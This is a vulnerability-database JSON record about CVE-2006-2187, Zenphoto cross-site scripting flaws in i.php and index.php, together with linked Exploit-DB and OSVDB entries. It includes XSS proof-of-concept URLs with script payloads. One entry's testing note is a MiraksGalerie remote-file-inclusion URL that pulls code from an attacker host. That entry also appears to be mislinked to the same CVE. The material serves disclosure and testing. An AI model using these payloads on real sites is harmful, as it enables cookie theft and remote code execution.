{"id": "EDB-ID:27795", "hash": "b22acdcd1fe501d535643a0d49f07bde", "type": "exploitdb", "bulletinFamily": "exploit", "title": "zenphoto 0.9/1.0 i.php a Parameter XSS", "description": "zenphoto 0.9/1.0 i.php a Parameter XSS. CVE-2006-2187. Webapps exploit for php platform", "published": "2006-05-02T00:00:00", "modified": "2006-05-02T00:00:00", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.exploit-db.com/exploits/27795/", "reporter": "zone14", "references": [], "cvelist": ["CVE-2006-2187"], "lastseen": "2016-02-03T06:45:15", "history": [], "viewCount": 0, "enchantments": {"score": {"value": 5.1, "vector": "NONE", "modified": "2016-02-03T06:45:15"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-2187"]}, {"type": "osvdb", "idList": ["OSVDB:25609", "OSVDB:26194", "OSVDB:25610"]}, {"type": "exploitdb", "idList": ["EDB-ID:27796"]}], "modified": "2016-02-03T06:45:15"}, "vulnersScore": 5.1}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/27795/", "sourceData": "source: http://www.securityfocus.com/bid/17779/info\r\n\r\nZenphoto is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. \r\n\r\nAn attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.\r\n\r\nZenphoto versions prior to 1.0.3 are vulnerable to this issue.\r\n\r\nhttp://www.example.com/photos/zen/i.php?a=%3Cscript%3Ealert('XSS%20Vulnerable')%3B%3C/script%3E&i=1%2Ejpg&s=thumb", "osvdbidlist": ["25609"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2019-05-29T18:08:32", "bulletinFamily": "NVD", "description": "Multiple cross-site scripting (XSS) vulnerabilities in zenphoto 1.0.1 beta and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) a parameter in i.php, and the (2) album and (3) image parameters in index.php.\nThis vulnerability is addressed in the following product release:\r\nzenphoto, zenphoto, 1.0.2 beta", "modified": "2018-10-18T16:38:00", "id": "CVE-2006-2187", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2187", "published": "2006-05-04T12:38:00", "title": "CVE-2006-2187", "type": "cve", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T06:45:24", "bulletinFamily": "exploit", "description": "zenphoto 0.9/1.0 index.php Multiple Parameter XSS. CVE-2006-2187. Webapps exploit for php platform", "modified": "2006-05-02T00:00:00", "published": "2006-05-02T00:00:00", "id": "EDB-ID:27796", "href": "https://www.exploit-db.com/exploits/27796/", "type": "exploitdb", "title": "zenphoto 0.9/1.0 index.php Multiple Parameter XSS", "sourceData": "source: http://www.securityfocus.com/bid/17779/info\r\n \r\nZenphoto is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. \r\n \r\nAn attacker may leverage these issues to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.\r\n \r\nZenphoto versions prior to 1.0.3 are vulnerable to this issue.\r\n\r\nhttp://www.example.com/photos/index.php?album=%3Cscript%3Ealert('XSS%20Vulnerable')%3B%3C/script%3E\r\nhttp://www.example.com/photos/index.php?album=EXISTING_ALBUM_NAME&image='%3E%3Cscript%3Ealert('XSS%20Vulnerable')%3B%3C/script%3E", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/27796/"}], "osvdb": [{"lastseen": "2017-04-28T13:20:22", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/photos/index.php?album=%3Cscript%3Ealert('XSS%20Vulnerable')%3B%3C/script%3E\nhttp://[target]/photos/index.php?album=EXISTING_ALBUM_NAMEℑ='%3E%3Cscript%3Ealert('XSS%20Vulnerable')%3B%3C/script%3E\n## References:\n[Related OSVDB ID: 25608](https://vulners.com/osvdb/OSVDB:25608)\n[Related OSVDB ID: 25609](https://vulners.com/osvdb/OSVDB:25609)\nOther Advisory URL: http://zone14.free.fr/advisories/2/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0169.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0030.html\n[CVE-2006-2187](https://vulners.com/cve/CVE-2006-2187)\nBugtraq ID: 17779\n", "modified": "2006-05-02T01:11:21", "published": "2006-05-02T01:11:21", "href": "https://vulners.com/osvdb/OSVDB:25610", "id": "OSVDB:25610", "title": "zenphoto index.php Multiple Variable XSS", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:22", "bulletinFamily": "software", "description": "## Vulnerability Description\nMiraksGalerie contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to pcltar.lib.php script not properly sanitizing user input supplied to the 'g_pcltar_lib_dir' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n## Solution Description\nCurrently, there are no known upgrades, patches, or workarounds available to correct this issue.\n## Short Description\nMiraksGalerie contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to pcltar.lib.php script not properly sanitizing user input supplied to the 'g_pcltar_lib_dir' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.\n## Manual Testing Notes\nhttp://[target]/[mg_path]/pcltar.lib.php?g_pcltar_lib_dir=http://[attacker]/cmd.php?exec=uname\n## References:\nVendor URL: http://www.miraks.com/index.php?url=print_outils&id=2022\n[Secunia Advisory ID:20475](https://secuniaresearch.flexerasoftware.com/advisories/20475/)\n[Related OSVDB ID: 26196](https://vulners.com/osvdb/OSVDB:26196)\n[Related OSVDB ID: 26195](https://vulners.com/osvdb/OSVDB:26195)\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0047.html\nFrSIRT Advisory: ADV-2006-2187\n[CVE-2006-2187](https://vulners.com/cve/CVE-2006-2187)\nBugtraq ID: 18313\n", "modified": "2006-06-06T08:34:03", "published": "2006-06-06T08:34:03", "href": "https://vulners.com/osvdb/OSVDB:26194", "id": "OSVDB:26194", "type": "osvdb", "title": "MiraksGalerie pcltar.lib.php g_pcltar_lib_dir Variable Remote File Inclusion", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-04-28T13:20:22", "bulletinFamily": "software", "description": "## Manual Testing Notes\nhttp://[target]/photos/zen/i.php?a=%3Cscript%3Ealert('XSS%20Vulnerable')%3B%3C/script%3E&i=1%2Ejpg&s=thumb\n## References:\n[Related OSVDB ID: 25608](https://vulners.com/osvdb/OSVDB:25608)\n[Related OSVDB ID: 25610](https://vulners.com/osvdb/OSVDB:25610)\nOther Advisory URL: http://zone14.free.fr/advisories/2/\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0030.html\n[CVE-2006-2187](https://vulners.com/cve/CVE-2006-2187)\nBugtraq ID: 17779\n", "modified": "2006-05-02T01:11:21", "published": "2006-05-02T01:11:21", "href": "https://vulners.com/osvdb/OSVDB:25609", "id": "OSVDB:25609", "title": "zenphoto i.php a Variable XSS", "type": "osvdb", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}